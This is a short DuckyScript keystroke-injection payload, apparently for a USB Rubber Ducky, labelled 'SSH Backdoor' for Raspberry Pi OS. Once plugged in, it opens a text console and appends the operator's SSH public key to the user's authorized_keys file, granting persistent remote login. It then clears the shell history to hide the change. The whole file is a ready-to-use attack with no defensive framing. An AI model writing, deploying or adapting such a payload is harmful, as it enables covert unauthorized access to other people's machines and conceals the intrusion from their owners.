REM =========================================================
REM Author: fierceoj
REM Description: SSH Backdoor
REM Target: Raspberry Pi OS
REM Usage: Replace "YOUR PUBLIC KEY" with your ssh public key 
REM =========================================================
DELAY 3000
CTRL-ALT F1
DELAY 200

REM Make .ssh directory in case it isn't there already
REM Add your public key to authorized_keys
STRING mkdir -p ~/.ssh && echo "YOUR PUBLIC KEY" >> ~/.ssh/authorized_keys
DELAY 200
ENTER

REM Clear command history
STRING history -c
DELAY 200
ENTER

